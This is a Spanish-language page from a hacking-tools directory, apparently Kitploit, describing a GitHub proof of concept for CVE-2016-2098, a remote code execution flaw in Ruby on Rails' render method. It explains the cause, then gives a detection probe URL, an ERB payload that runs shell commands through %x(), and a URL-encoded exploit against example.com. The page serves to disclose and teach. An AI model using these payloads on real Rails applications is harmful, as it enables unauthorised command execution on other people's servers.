Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2016-2098 — Vulnerabilidad de ejecución remota de código en Ruby-on-Rails al usar render sobre datos proporcionados por el usuario. | Kitploit
Herramientas/GitHubGitHub/j4k0m/cve-2016-2098
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

Vulnerabilidad de ejecución remota de código en Ruby-on-Rails al usar render sobre datos proporcionados por el usuario.

Ver Repositorio
4hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2016-2098

Vulnerabilidad de ejecución remota de código en Ruby-on-Rails cuando se usa render con datos proporcionados por el usuario.

Explicación:

Este problema proviene del uso del método render con datos proporcionados por el usuario.

El método render se usa normalmente para renderizar una página desde una plantilla, pero el método render también permite a los desarrolladores renderizar texto plano (plaintext) e incluso código en línea (inline).

Función render:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

Ejemplo de explotación:

URL de destino:

root@kitploit:~
http://example.com/?view=test

Explotación:

root@kitploit:~
http://example.com/?view[inline]=OK

Si 'OK' aparece en el código fuente, entonces la aplicación web es vulnerable a CVE-2016-2098.

Ejecución remota de código

root@kitploit:~
<%= %x('[CMD]') %>

Podemos reemplazar CMD con el comando que queremos que se ejecute.

root@kitploit:~
<%= %x('whoami') %>

Después de la codificación URL:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

Final:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

Recursos:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
Descargar herramienta